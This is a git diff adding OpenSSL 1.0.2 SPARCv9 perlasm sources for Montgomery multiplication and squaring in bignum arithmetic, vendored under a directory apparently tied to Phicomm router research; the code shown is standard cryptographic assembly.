+	st	%g0,[$tp+%o7]		! zap tp
+	st	%o0,[$rp+%o7]
+	add	%o7,4,%o7
+	brnz	%o7,.Lcopy
+	nop
+	mov	1,%i0
+	ret
+	restore
+___
+
+########
+######## .Lbn_sqr_mont gives up to 20% *overall* improvement over
+######## code without following dedicated squaring procedure.
+########
+$sbit="%i2";		# re-use $bp!
+
+$code.=<<___;
+.align	32
+.Lbn_sqr_mont:
+	mulx	$mul0,$mul0,$car0		! ap[0]*ap[0]
+	mulx	$apj,$mul0,$tmp0		!prologue!
+	and	$car0,$mask,$acc0
+	add	%sp,$bias+$frame,$tp
+	ld	[$ap+8],$apj			!prologue!
+
+	mulx	$n0,$acc0,$mul1			! "t[0]"*n0
+	srlx	$car0,32,$car0
+	and	$mul1,$mask,$mul1
+
+	mulx	$car1,$mul1,$car1		! np[0]*"t[0]"*n0
+	mulx	$npj,$mul1,$acc1		!prologue!
+	and	$car0,1,$sbit
+	ld	[$np+8],$npj			!prologue!
+	srlx	$car0,1,$car0
+	add	$acc0,$car1,$car1
+	srlx	$car1,32,$car1
+	mov	$tmp0,$acc0			!prologue!
+
+.Lsqr_1st:
+	mulx	$apj,$mul0,$tmp0
+	mulx	$npj,$mul1,$tmp1
+	add	$acc0,$car0,$car0		! ap[j]*a0+c0
+	add	$acc1,$car1,$car1
+	ld	[$ap+$j],$apj			! ap[j]
+	and	$car0,$mask,$acc0
+	ld	[$np+$j],$npj			! np[j]
+	srlx	$car0,32,$car0
+	add	$acc0,$acc0,$acc0
+	or	$sbit,$acc0,$acc0
+	mov	$tmp1,$acc1
+	srlx	$acc0,32,$sbit
+	add	$j,4,$j				! j++
+	and	$acc0,$mask,$acc0
+	cmp	$j,$num
+	add	$acc0,$car1,$car1
+	st	$car1,[$tp]
+	mov	$tmp0,$acc0
+	srlx	$car1,32,$car1
+	bl	%icc,.Lsqr_1st
+	add	$tp,4,$tp			! tp++
+!.Lsqr_1st
+
+	mulx	$apj,$mul0,$tmp0		! epilogue
+	mulx	$npj,$mul1,$tmp1
+	add	$acc0,$car0,$car0		! ap[j]*a0+c0
+	add	$acc1,$car1,$car1
+	and	$car0,$mask,$acc0
+	srlx	$car0,32,$car0
+	add	$acc0,$acc0,$acc0
+	or	$sbit,$acc0,$acc0
+	srlx	$acc0,32,$sbit
+	and	$acc0,$mask,$acc0
+	add	$acc0,$car1,$car1
+	st	$car1,[$tp]
+	srlx	$car1,32,$car1
+
+	add	$tmp0,$car0,$car0		! ap[j]*a0+c0
+	add	$tmp1,$car1,$car1
+	and	$car0,$mask,$acc0
+	srlx	$car0,32,$car0
+	add	$acc0,$acc0,$acc0
+	or	$sbit,$acc0,$acc0
+	srlx	$acc0,32,$sbit
+	and	$acc0,$mask,$acc0
+	add	$acc0,$car1,$car1
+	st	$car1,[$tp+4]
+	srlx	$car1,32,$car1
+
+	add	$car0,$car0,$car0
+	or	$sbit,$car0,$car0
+	add	$car0,$car1,$car1
+	st	$car1,[$tp+8]
+	srlx	$car1,32,$car2
+
+	ld	[%sp+$bias+$frame],$tmp0	! tp[0]
+	ld	[%sp+$bias+$frame+4],$tmp1	! tp[1]
+	ld	[%sp+$bias+$frame+8],$tpj	! tp[2]
+	ld	[$ap+4],$mul0			! ap[1]
+	ld	[$ap+8],$apj			! ap[2]
+	ld	[$np],$car1			! np[0]
+	ld	[$np+4],$npj			! np[1]
+	mulx	$n0,$tmp0,$mul1
+
+	mulx	$mul0,$mul0,$car0
+	and	$mul1,$mask,$mul1
+
+	mulx	$car1,$mul1,$car1
+	mulx	$npj,$mul1,$acc1
+	add	$tmp0,$car1,$car1
+	and	$car0,$mask,$acc0
+	ld	[$np+8],$npj			! np[2]
+	srlx	$car1,32,$car1
+	add	$tmp1,$car1,$car1
+	srlx	$car0,32,$car0
+	add	$acc0,$car1,$car1
+	and	$car0,1,$sbit
+	add	$acc1,$car1,$car1
+	srlx	$car0,1,$car0
+	mov	12,$j
+	st	$car1,[%sp+$bias+$frame]	! tp[0]=
+	srlx	$car1,32,$car1
+	add	%sp,$bias+$frame+4,$tp
+
+.Lsqr_2nd:
+	mulx	$apj,$mul0,$acc0
+	mulx	$npj,$mul1,$acc1
+	add	$acc0,$car0,$car0
+	add	$tpj,$car1,$car1
+	ld	[$ap+$j],$apj			! ap[j]
+	and	$car0,$mask,$acc0
+	ld	[$np+$j],$npj			! np[j]
+	srlx	$car0,32,$car0
+	add	$acc1,$car1,$car1
+	ld	[$tp+8],$tpj			! tp[j]
+	add	$acc0,$acc0,$acc0
+	add	$j,4,$j				! j++
+	or	$sbit,$acc0,$acc0
+	srlx	$acc0,32,$sbit
+	and	$acc0,$mask,$acc0
+	cmp	$j,$num
+	add	$acc0,$car1,$car1
+	st	$car1,[$tp]			! tp[j-1]
+	srlx	$car1,32,$car1
+	bl	%icc,.Lsqr_2nd
+	add	$tp,4,$tp			! tp++
+!.Lsqr_2nd
+
+	mulx	$apj,$mul0,$acc0
+	mulx	$npj,$mul1,$acc1
+	add	$acc0,$car0,$car0
+	add	$tpj,$car1,$car1
+	and	$car0,$mask,$acc0
+	srlx	$car0,32,$car0
+	add	$acc1,$car1,$car1
+	add	$acc0,$acc0,$acc0
+	or	$sbit,$acc0,$acc0
+	srlx	$acc0,32,$sbit
+	and	$acc0,$mask,$acc0
+	add	$acc0,$car1,$car1
+	st	$car1,[$tp]			! tp[j-1]
+	srlx	$car1,32,$car1
+
+	add	$car0,$car0,$car0
+	or	$sbit,$car0,$car0
+	add	$car0,$car1,$car1
+	add	$car2,$car1,$car1
+	st	$car1,[$tp+4]
+	srlx	$car1,32,$car2
+
+	ld	[%sp+$bias+$frame],$tmp1	! tp[0]
+	ld	[%sp+$bias+$frame+4],$tpj	! tp[1]
+	ld	[$ap+8],$mul0			! ap[2]
+	ld	[$np],$car1			! np[0]
+	ld	[$np+4],$npj			! np[1]
+	mulx	$n0,$tmp1,$mul1
+	and	$mul1,$mask,$mul1
+	mov	8,$i
+
+	mulx	$mul0,$mul0,$car0
+	mulx	$car1,$mul1,$car1
+	and	$car0,$mask,$acc0
+	add	$tmp1,$car1,$car1
+	srlx	$car0,32,$car0
+	add	%sp,$bias+$frame,$tp
+	srlx	$car1,32,$car1
+	and	$car0,1,$sbit
+	srlx	$car0,1,$car0
+	mov	4,$j
+
+.Lsqr_outer:
+.Lsqr_inner1:
+	mulx	$npj,$mul1,$acc1
+	add	$tpj,$car1,$car1
+	add	$j,4,$j
+	ld	[$tp+8],$tpj
+	cmp	$j,$i
+	add	$acc1,$car1,$car1
+	ld	[$np+$j],$npj
+	st	$car1,[$tp]
+	srlx	$car1,32,$car1
+	bl	%icc,.Lsqr_inner1
+	add	$tp,4,$tp
+!.Lsqr_inner1
+
+	add	$j,4,$j
+	ld	[$ap+$j],$apj			! ap[j]
+	mulx	$npj,$mul1,$acc1
+	add	$tpj,$car1,$car1
+	ld	[$np+$j],$npj			! np[j]
+	add	$acc0,$car1,$car1
+	ld	[$tp+8],$tpj			! tp[j]
+	add	$acc1,$car1,$car1
+	st	$car1,[$tp]
+	srlx	$car1,32,$car1
+
+	add	$j,4,$j
+	cmp	$j,$num
+	be,pn	%icc,.Lsqr_no_inner2
+	add	$tp,4,$tp
+
+.Lsqr_inner2:
+	mulx	$apj,$mul0,$acc0
+	mulx	$npj,$mul1,$acc1
+	add	$tpj,$car1,$car1
+	add	$acc0,$car0,$car0
+	ld	[$ap+$j],$apj			! ap[j]
+	and	$car0,$mask,$acc0
+	ld	[$np+$j],$npj			! np[j]
+	srlx	$car0,32,$car0
+	add	$acc0,$acc0,$acc0
+	ld	[$tp+8],$tpj			! tp[j]
+	or	$sbit,$acc0,$acc0
+	add	$j,4,$j				! j++
+	srlx	$acc0,32,$sbit
+	and	$acc0,$mask,$acc0
+	cmp	$j,$num
+	add	$acc0,$car1,$car1
+	add	$acc1,$car1,$car1
+	st	$car1,[$tp]			! tp[j-1]
+	srlx	$car1,32,$car1
+	bl	%icc,.Lsqr_inner2
+	add	$tp,4,$tp			! tp++
+
+.Lsqr_no_inner2:
+	mulx	$apj,$mul0,$acc0
+	mulx	$npj,$mul1,$acc1
+	add	$tpj,$car1,$car1
+	add	$acc0,$car0,$car0
+	and	$car0,$mask,$acc0
+	srlx	$car0,32,$car0
+	add	$acc0,$acc0,$acc0
+	or	$sbit,$acc0,$acc0
+	srlx	$acc0,32,$sbit
+	and	$acc0,$mask,$acc0
+	add	$acc0,$car1,$car1
+	add	$acc1,$car1,$car1
+	st	$car1,[$tp]			! tp[j-1]
+	srlx	$car1,32,$car1
+
+	add	$car0,$car0,$car0
+	or	$sbit,$car0,$car0
+	add	$car0,$car1,$car1
+	add	$car2,$car1,$car1
+	st	$car1,[$tp+4]
+	srlx	$car1,32,$car2
+
+	add	$i,4,$i				! i++
+	ld	[%sp+$bias+$frame],$tmp1	! tp[0]
+	ld	[%sp+$bias+$frame+4],$tpj	! tp[1]
+	ld	[$ap+$i],$mul0			! ap[j]
+	ld	[$np],$car1			! np[0]
+	ld	[$np+4],$npj			! np[1]
+	mulx	$n0,$tmp1,$mul1
+	and	$mul1,$mask,$mul1
+	add	$i,4,$tmp0
+
+	mulx	$mul0,$mul0,$car0
+	mulx	$car1,$mul1,$car1
+	and	$car0,$mask,$acc0
+	add	$tmp1,$car1,$car1
+	srlx	$car0,32,$car0
+	add	%sp,$bias+$frame,$tp
+	srlx	$car1,32,$car1
+	and	$car0,1,$sbit
+	srlx	$car0,1,$car0
+
+	cmp	$tmp0,$num			! i<num-1
+	bl	%icc,.Lsqr_outer
+	mov	4,$j
+
+.Lsqr_last:
+	mulx	$npj,$mul1,$acc1
+	add	$tpj,$car1,$car1
+	add	$j,4,$j
+	ld	[$tp+8],$tpj
+	cmp	$j,$i
+	add	$acc1,$car1,$car1
+	ld	[$np+$j],$npj
+	st	$car1,[$tp]
+	srlx	$car1,32,$car1
+	bl	%icc,.Lsqr_last
+	add	$tp,4,$tp
+!.Lsqr_last
+
+	mulx	$npj,$mul1,$acc1
+	add	$tpj,$car1,$car1
+	add	$acc0,$car1,$car1
+	add	$acc1,$car1,$car1
+	st	$car1,[$tp]
+	srlx	$car1,32,$car1
+
+	add	$car0,$car0,$car0		! recover $car0
+	or	$sbit,$car0,$car0
+	add	$car0,$car1,$car1
+	add	$car2,$car1,$car1
+	st	$car1,[$tp+4]
+	srlx	$car1,32,$car2
+
+	ba	.Ltail
+	add	$tp,8,$tp
+.type	$fname,#function
+.size	$fname,(.-$fname)
+.asciz	"Montgomery Multipltication for SPARCv9, CRYPTOGAMS by <appro\@openssl.org>"
+.align	32
+___
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv9a-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv9a-mont.pl
new file mode 100755
index 0000000..a14205f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv9a-mont.pl
@@ -0,0 +1,882 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# October 2005
+#
+# "Teaser" Montgomery multiplication module for UltraSPARC. Why FPU?
+# Because unlike integer multiplier, which simply stalls whole CPU,
+# FPU is fully pipelined and can effectively emit 48 bit partial
+# product every cycle. Why not blended SPARC v9? One can argue that
+# making this module dependent on UltraSPARC VIS extension limits its
+# binary compatibility. Well yes, it does exclude SPARC64 prior-V(!)
+# implementations from compatibility matrix. But the rest, whole Sun
+# UltraSPARC family and brand new Fujitsu's SPARC64 V, all support
+# VIS extension instructions used in this module. This is considered
+# good enough to not care about HAL SPARC64 users [if any] who have
+# integer-only pure SPARCv9 module to "fall down" to.
+
+# USI&II cores currently exhibit uniform 2x improvement [over pre-
+# bn_mul_mont codebase] for all key lengths and benchmarks. On USIII
+# performance improves few percents for shorter keys and worsens few
+# percents for longer keys. This is because USIII integer multiplier
+# is >3x faster than USI&II one, which is harder to match [but see
+# TODO list below]. It should also be noted that SPARC64 V features
+# out-of-order execution, which *might* mean that integer multiplier
+# is pipelined, which in turn *might* be impossible to match... On
+# additional note, SPARC64 V implements FP Multiply-Add instruction,
+# which is perfectly usable in this context... In other words, as far
+# as Fujitsu SPARC64 V goes, talk to the author:-)
+
+# The implementation implies following "non-natural" limitations on
+# input arguments:
+# - num may not be less than 4;
+# - num has to be even;
+# Failure to meet either condition has no fatal effects, simply
+# doesn't give any performance gain.
+
+# TODO:
+# - modulo-schedule inner loop for better performance (on in-order
+#   execution core such as UltraSPARC this shall result in further
+#   noticeable(!) improvement);
+# - dedicated squaring procedure[?];
+
+######################################################################
+# November 2006
+#
+# Modulo-scheduled inner loops allow to interleave floating point and
+# integer instructions and minimize Read-After-Write penalties. This
+# results in *further* 20-50% perfromance improvement [depending on
+# key length, more for longer keys] on USI&II cores and 30-80% - on
+# USIII&IV.
+
+$fname="bn_mul_mont_fpu";
+$bits=32;
+for (@ARGV) { $bits=64 if (/\-m64/ || /\-xarch\=v9/); }
+
+if ($bits==64) {
+	$bias=2047;
+	$frame=192;
+} else {
+	$bias=0;
+	$frame=128;	# 96 rounded up to largest known cache-line
+}
+$locals=64;
+
+# In order to provide for 32-/64-bit ABI duality, I keep integers wider
+# than 32 bit in %g1-%g4 and %o0-%o5. %l0-%l7 and %i0-%i5 are used
+# exclusively for pointers, indexes and other small values...
+# int bn_mul_mont(
+$rp="%i0";	# BN_ULONG *rp,
+$ap="%i1";	# const BN_ULONG *ap,
+$bp="%i2";	# const BN_ULONG *bp,
+$np="%i3";	# const BN_ULONG *np,
+$n0="%i4";	# const BN_ULONG *n0,
+$num="%i5";	# int num);
+
+$tp="%l0";	# t[num]
+$ap_l="%l1";	# a[num],n[num] are smashed to 32-bit words and saved
+$ap_h="%l2";	# to these four vectors as double-precision FP values.
+$np_l="%l3";	# This way a bunch of fxtods are eliminated in second
+$np_h="%l4";	# loop and L1-cache aliasing is minimized...
+$i="%l5";
+$j="%l6";
+$mask="%l7";	# 16-bit mask, 0xffff
+
+$n0="%g4";	# reassigned(!) to "64-bit" register
+$carry="%i4";	# %i4 reused(!) for a carry bit
+
+# FP register naming chart
+#
+#     ..HILO
+#       dcba
+#   --------
+#        LOa
+#       LOb
+#      LOc
+#     LOd
+#      HIa
+#     HIb
+#    HIc
+#   HId
+#    ..a
+#   ..b
+$ba="%f0";    $bb="%f2";    $bc="%f4";    $bd="%f6";
+$na="%f8";    $nb="%f10";   $nc="%f12";   $nd="%f14";
+$alo="%f16";  $alo_="%f17"; $ahi="%f18";  $ahi_="%f19";
+$nlo="%f20";  $nlo_="%f21"; $nhi="%f22";  $nhi_="%f23";
+
+$dota="%f24"; $dotb="%f26";
+
+$aloa="%f32"; $alob="%f34"; $aloc="%f36"; $alod="%f38";
+$ahia="%f40"; $ahib="%f42"; $ahic="%f44"; $ahid="%f46";
+$nloa="%f48"; $nlob="%f50"; $nloc="%f52"; $nlod="%f54";
+$nhia="%f56"; $nhib="%f58"; $nhic="%f60"; $nhid="%f62";
+
+$ASI_FL16_P=0xD2;	# magic ASI value to engage 16-bit FP load
+
+$code=<<___;
+.section	".text",#alloc,#execinstr
+
+.global $fname
+.align  32
+$fname:
+	save	%sp,-$frame-$locals,%sp
+
+	cmp	$num,4
+	bl,a,pn %icc,.Lret
+	clr	%i0
+	andcc	$num,1,%g0		! $num has to be even...
+	bnz,a,pn %icc,.Lret
+	clr	%i0			! signal "unsupported input value"
+
+	srl	$num,1,$num
+	sethi	%hi(0xffff),$mask
+	ld	[%i4+0],$n0		! $n0 reassigned, remember?
+	or	$mask,%lo(0xffff),$mask
+	ld	[%i4+4],%o0
+	sllx	%o0,32,%o0
+	or	%o0,$n0,$n0		! $n0=n0[1].n0[0]
+
+	sll	$num,3,$num		! num*=8
+
+	add	%sp,$bias,%o0		! real top of stack
+	sll	$num,2,%o1
+	add	%o1,$num,%o1		! %o1=num*5
+	sub	%o0,%o1,%o0
+	and	%o0,-2048,%o0		! optimize TLB utilization
+	sub	%o0,$bias,%sp		! alloca(5*num*8)
+
+	rd	%asi,%o7		! save %asi
+	add	%sp,$bias+$frame+$locals,$tp
+	add	$tp,$num,$ap_l
+	add	$ap_l,$num,$ap_l	! [an]p_[lh] point at the vectors' ends !
+	add	$ap_l,$num,$ap_h
+	add	$ap_h,$num,$np_l
+	add	$np_l,$num,$np_h
+
+	wr	%g0,$ASI_FL16_P,%asi	! setup %asi for 16-bit FP loads
+
+	add	$rp,$num,$rp		! readjust input pointers to point
+	add	$ap,$num,$ap		! at the ends too...
+	add	$bp,$num,$bp
+	add	$np,$num,$np
+
+	stx	%o7,[%sp+$bias+$frame+48]	! save %asi
+
+	sub	%g0,$num,$i		! i=-num
+	sub	%g0,$num,$j		! j=-num
+
+	add	$ap,$j,%o3
+	add	$bp,$i,%o4
+
+	ld	[%o3+4],%g1		! bp[0]
+	ld	[%o3+0],%o0
+	ld	[%o4+4],%g5		! ap[0]
+	sllx	%g1,32,%g1
+	ld	[%o4+0],%o1
+	sllx	%g5,32,%g5
+	or	%g1,%o0,%o0
+	or	%g5,%o1,%o1
+
+	add	$np,$j,%o5
+
+	mulx	%o1,%o0,%o0		! ap[0]*bp[0]
+	mulx	$n0,%o0,%o0		! ap[0]*bp[0]*n0
+	stx	%o0,[%sp+$bias+$frame+0]
+
+	ld	[%o3+0],$alo_	! load a[j] as pair of 32-bit words
+	fzeros	$alo
+	ld	[%o3+4],$ahi_
+	fzeros	$ahi
+	ld	[%o5+0],$nlo_	! load n[j] as pair of 32-bit words
+	fzeros	$nlo
+	ld	[%o5+4],$nhi_
+	fzeros	$nhi
+
+	! transfer b[i] to FPU as 4x16-bit values
+	ldda	[%o4+2]%asi,$ba
+	fxtod	$alo,$alo
+	ldda	[%o4+0]%asi,$bb
+	fxtod	$ahi,$ahi
+	ldda	[%o4+6]%asi,$bc
+	fxtod	$nlo,$nlo
+	ldda	[%o4+4]%asi,$bd
+	fxtod	$nhi,$nhi
+
+	! transfer ap[0]*b[0]*n0 to FPU as 4x16-bit values
+	ldda	[%sp+$bias+$frame+6]%asi,$na
+	fxtod	$ba,$ba
+	ldda	[%sp+$bias+$frame+4]%asi,$nb
+	fxtod	$bb,$bb
+	ldda	[%sp+$bias+$frame+2]%asi,$nc
+	fxtod	$bc,$bc
+	ldda	[%sp+$bias+$frame+0]%asi,$nd
+	fxtod	$bd,$bd
+
+	std	$alo,[$ap_l+$j]		! save smashed ap[j] in double format
+	fxtod	$na,$na
+	std	$ahi,[$ap_h+$j]
+	fxtod	$nb,$nb
+	std	$nlo,[$np_l+$j]		! save smashed np[j] in double format
+	fxtod	$nc,$nc
+	std	$nhi,[$np_h+$j]
+	fxtod	$nd,$nd
+
+		fmuld	$alo,$ba,$aloa
+		fmuld	$nlo,$na,$nloa
+		fmuld	$alo,$bb,$alob
+		fmuld	$nlo,$nb,$nlob
+		fmuld	$alo,$bc,$aloc
+	faddd	$aloa,$nloa,$nloa
+		fmuld	$nlo,$nc,$nloc
+		fmuld	$alo,$bd,$alod
+	faddd	$alob,$nlob,$nlob
+		fmuld	$nlo,$nd,$nlod
+		fmuld	$ahi,$ba,$ahia
+	faddd	$aloc,$nloc,$nloc
+		fmuld	$nhi,$na,$nhia
+		fmuld	$ahi,$bb,$ahib
+	faddd	$alod,$nlod,$nlod
+		fmuld	$nhi,$nb,$nhib
+		fmuld	$ahi,$bc,$ahic
+	faddd	$ahia,$nhia,$nhia
+		fmuld	$nhi,$nc,$nhic
+		fmuld	$ahi,$bd,$ahid
+	faddd	$ahib,$nhib,$nhib
+		fmuld	$nhi,$nd,$nhid
+
+	faddd	$ahic,$nhic,$dota	! $nhic
+	faddd	$ahid,$nhid,$dotb	! $nhid
+
+	faddd	$nloc,$nhia,$nloc
+	faddd	$nlod,$nhib,$nlod
+
+	fdtox	$nloa,$nloa
+	fdtox	$nlob,$nlob
+	fdtox	$nloc,$nloc
+	fdtox	$nlod,$nlod
+
+	std	$nloa,[%sp+$bias+$frame+0]
+	add	$j,8,$j
+	std	$nlob,[%sp+$bias+$frame+8]
+	add	$ap,$j,%o4
+	std	$nloc,[%sp+$bias+$frame+16]
+	add	$np,$j,%o5
+	std	$nlod,[%sp+$bias+$frame+24]
+
+	ld	[%o4+0],$alo_	! load a[j] as pair of 32-bit words
+	fzeros	$alo
+	ld	[%o4+4],$ahi_
+	fzeros	$ahi
+	ld	[%o5+0],$nlo_	! load n[j] as pair of 32-bit words
+	fzeros	$nlo
+	ld	[%o5+4],$nhi_
+	fzeros	$nhi
+
+	fxtod	$alo,$alo
+	fxtod	$ahi,$ahi
+	fxtod	$nlo,$nlo
+	fxtod	$nhi,$nhi
+
+	ldx	[%sp+$bias+$frame+0],%o0
+		fmuld	$alo,$ba,$aloa
+	ldx	[%sp+$bias+$frame+8],%o1
+		fmuld	$nlo,$na,$nloa
+	ldx	[%sp+$bias+$frame+16],%o2
+		fmuld	$alo,$bb,$alob
+	ldx	[%sp+$bias+$frame+24],%o3
+		fmuld	$nlo,$nb,$nlob
+
+	srlx	%o0,16,%o7
+	std	$alo,[$ap_l+$j]		! save smashed ap[j] in double format
+		fmuld	$alo,$bc,$aloc
+	add	%o7,%o1,%o1
+	std	$ahi,[$ap_h+$j]
+		faddd	$aloa,$nloa,$nloa
+		fmuld	$nlo,$nc,$nloc
+	srlx	%o1,16,%o7
+	std	$nlo,[$np_l+$j]		! save smashed np[j] in double format
+		fmuld	$alo,$bd,$alod
+	add	%o7,%o2,%o2
+	std	$nhi,[$np_h+$j]
+		faddd	$alob,$nlob,$nlob
+		fmuld	$nlo,$nd,$nlod
+	srlx	%o2,16,%o7
+		fmuld	$ahi,$ba,$ahia
+	add	%o7,%o3,%o3		! %o3.%o2[0..15].%o1[0..15].%o0[0..15]
+		faddd	$aloc,$nloc,$nloc
+		fmuld	$nhi,$na,$nhia
+	!and	%o0,$mask,%o0
+	!and	%o1,$mask,%o1
+	!and	%o2,$mask,%o2
+	!sllx	%o1,16,%o1
+	!sllx	%o2,32,%o2
+	!sllx	%o3,48,%o7
+	!or	%o1,%o0,%o0
+	!or	%o2,%o0,%o0
+	!or	%o7,%o0,%o0		! 64-bit result
+	srlx	%o3,16,%g1		! 34-bit carry
+		fmuld	$ahi,$bb,$ahib
+
+	faddd	$alod,$nlod,$nlod
+		fmuld	$nhi,$nb,$nhib
+		fmuld	$ahi,$bc,$ahic
+	faddd	$ahia,$nhia,$nhia
+		fmuld	$nhi,$nc,$nhic
+		fmuld	$ahi,$bd,$ahid
+	faddd	$ahib,$nhib,$nhib
+		fmuld	$nhi,$nd,$nhid
+
+	faddd	$dota,$nloa,$nloa
+	faddd	$dotb,$nlob,$nlob
+	faddd	$ahic,$nhic,$dota	! $nhic
+	faddd	$ahid,$nhid,$dotb	! $nhid
+
+	faddd	$nloc,$nhia,$nloc
+	faddd	$nlod,$nhib,$nlod
+
+	fdtox	$nloa,$nloa
+	fdtox	$nlob,$nlob
+	fdtox	$nloc,$nloc
+	fdtox	$nlod,$nlod
+
+	std	$nloa,[%sp+$bias+$frame+0]
+	std	$nlob,[%sp+$bias+$frame+8]
+	addcc	$j,8,$j
+	std	$nloc,[%sp+$bias+$frame+16]
+	bz,pn	%icc,.L1stskip
+	std	$nlod,[%sp+$bias+$frame+24]
+
+.align	32			! incidentally already aligned !
+.L1st:
+	add	$ap,$j,%o4
+	add	$np,$j,%o5
+	ld	[%o4+0],$alo_	! load a[j] as pair of 32-bit words
+	fzeros	$alo
+	ld	[%o4+4],$ahi_
+	fzeros	$ahi
+	ld	[%o5+0],$nlo_	! load n[j] as pair of 32-bit words
+	fzeros	$nlo
+	ld	[%o5+4],$nhi_
+	fzeros	$nhi
+
+	fxtod	$alo,$alo
+	fxtod	$ahi,$ahi
+	fxtod	$nlo,$nlo
+	fxtod	$nhi,$nhi
+
+	ldx	[%sp+$bias+$frame+0],%o0
+		fmuld	$alo,$ba,$aloa
+	ldx	[%sp+$bias+$frame+8],%o1
+		fmuld	$nlo,$na,$nloa
+	ldx	[%sp+$bias+$frame+16],%o2
+		fmuld	$alo,$bb,$alob
+	ldx	[%sp+$bias+$frame+24],%o3
+		fmuld	$nlo,$nb,$nlob
+
+	srlx	%o0,16,%o7
+	std	$alo,[$ap_l+$j]		! save smashed ap[j] in double format
+		fmuld	$alo,$bc,$aloc
+	add	%o7,%o1,%o1
+	std	$ahi,[$ap_h+$j]
+		faddd	$aloa,$nloa,$nloa
+		fmuld	$nlo,$nc,$nloc
+	srlx	%o1,16,%o7
+	std	$nlo,[$np_l+$j]		! save smashed np[j] in double format
+		fmuld	$alo,$bd,$alod
+	add	%o7,%o2,%o2
+	std	$nhi,[$np_h+$j]
+		faddd	$alob,$nlob,$nlob
+		fmuld	$nlo,$nd,$nlod
+	srlx	%o2,16,%o7
+		fmuld	$ahi,$ba,$ahia
+	add	%o7,%o3,%o3		! %o3.%o2[0..15].%o1[0..15].%o0[0..15]
+	and	%o0,$mask,%o0
+		faddd	$aloc,$nloc,$nloc
+		fmuld	$nhi,$na,$nhia
+	and	%o1,$mask,%o1
+	and	%o2,$mask,%o2
+		fmuld	$ahi,$bb,$ahib
+	sllx	%o1,16,%o1
+		faddd	$alod,$nlod,$nlod
+		fmuld	$nhi,$nb,$nhib
+	sllx	%o2,32,%o2
+		fmuld	$ahi,$bc,$ahic
+	sllx	%o3,48,%o7
+	or	%o1,%o0,%o0
+		faddd	$ahia,$nhia,$nhia
+		fmuld	$nhi,$nc,$nhic
+	or	%o2,%o0,%o0
+		fmuld	$ahi,$bd,$ahid
+	or	%o7,%o0,%o0		! 64-bit result
+		faddd	$ahib,$nhib,$nhib
+		fmuld	$nhi,$nd,$nhid
+	addcc	%g1,%o0,%o0
+		faddd	$dota,$nloa,$nloa
+	srlx	%o3,16,%g1		! 34-bit carry
+		faddd	$dotb,$nlob,$nlob
+	bcs,a	%xcc,.+8
+	add	%g1,1,%g1
+
+	stx	%o0,[$tp]		! tp[j-1]=
+
+	faddd	$ahic,$nhic,$dota	! $nhic
+	faddd	$ahid,$nhid,$dotb	! $nhid
+
+	faddd	$nloc,$nhia,$nloc
+	faddd	$nlod,$nhib,$nlod
+
+	fdtox	$nloa,$nloa
+	fdtox	$nlob,$nlob
+	fdtox	$nloc,$nloc
+	fdtox	$nlod,$nlod
+
+	std	$nloa,[%sp+$bias+$frame+0]
+	std	$nlob,[%sp+$bias+$frame+8]
+	std	$nloc,[%sp+$bias+$frame+16]
+	std	$nlod,[%sp+$bias+$frame+24]
+
+	addcc	$j,8,$j
+	bnz,pt	%icc,.L1st
+	add	$tp,8,$tp
+
+.L1stskip:
+	fdtox	$dota,$dota
+	fdtox	$dotb,$dotb
+
+	ldx	[%sp+$bias+$frame+0],%o0
+	ldx	[%sp+$bias+$frame+8],%o1
+	ldx	[%sp+$bias+$frame+16],%o2
+	ldx	[%sp+$bias+$frame+24],%o3
+
+	srlx	%o0,16,%o7
+	std	$dota,[%sp+$bias+$frame+32]
+	add	%o7,%o1,%o1
+	std	$dotb,[%sp+$bias+$frame+40]
+	srlx	%o1,16,%o7
+	add	%o7,%o2,%o2
+	srlx	%o2,16,%o7
+	add	%o7,%o3,%o3		! %o3.%o2[0..15].%o1[0..15].%o0[0..15]
+	and	%o0,$mask,%o0
+	and	%o1,$mask,%o1
+	and	%o2,$mask,%o2
+	sllx	%o1,16,%o1
+	sllx	%o2,32,%o2
+	sllx	%o3,48,%o7
+	or	%o1,%o0,%o0
+	or	%o2,%o0,%o0
+	or	%o7,%o0,%o0		! 64-bit result
+	ldx	[%sp+$bias+$frame+32],%o4
+	addcc	%g1,%o0,%o0
+	ldx	[%sp+$bias+$frame+40],%o5
+	srlx	%o3,16,%g1		! 34-bit carry
+	bcs,a	%xcc,.+8
+	add	%g1,1,%g1
+
+	stx	%o0,[$tp]		! tp[j-1]=
+	add	$tp,8,$tp
+
+	srlx	%o4,16,%o7
+	add	%o7,%o5,%o5
+	and	%o4,$mask,%o4
+	sllx	%o5,16,%o7
+	or	%o7,%o4,%o4
+	addcc	%g1,%o4,%o4
+	srlx	%o5,48,%g1
+	bcs,a	%xcc,.+8
+	add	%g1,1,%g1
+
+	mov	%g1,$carry
+	stx	%o4,[$tp]		! tp[num-1]=
+
+	ba	.Louter
+	add	$i,8,$i
+.align	32
+.Louter:
+	sub	%g0,$num,$j		! j=-num
+	add	%sp,$bias+$frame+$locals,$tp
+
+	add	$ap,$j,%o3
+	add	$bp,$i,%o4
+
+	ld	[%o3+4],%g1		! bp[i]
+	ld	[%o3+0],%o0
+	ld	[%o4+4],%g5		! ap[0]
+	sllx	%g1,32,%g1
+	ld	[%o4+0],%o1
+	sllx	%g5,32,%g5
+	or	%g1,%o0,%o0
+	or	%g5,%o1,%o1
+
+	ldx	[$tp],%o2		! tp[0]
+	mulx	%o1,%o0,%o0
+	addcc	%o2,%o0,%o0
+	mulx	$n0,%o0,%o0		! (ap[0]*bp[i]+t[0])*n0
+	stx	%o0,[%sp+$bias+$frame+0]
+
+	! transfer b[i] to FPU as 4x16-bit values
+	ldda	[%o4+2]%asi,$ba
+	ldda	[%o4+0]%asi,$bb
+	ldda	[%o4+6]%asi,$bc
+	ldda	[%o4+4]%asi,$bd
+
+	! transfer (ap[0]*b[i]+t[0])*n0 to FPU as 4x16-bit values
+	ldda	[%sp+$bias+$frame+6]%asi,$na
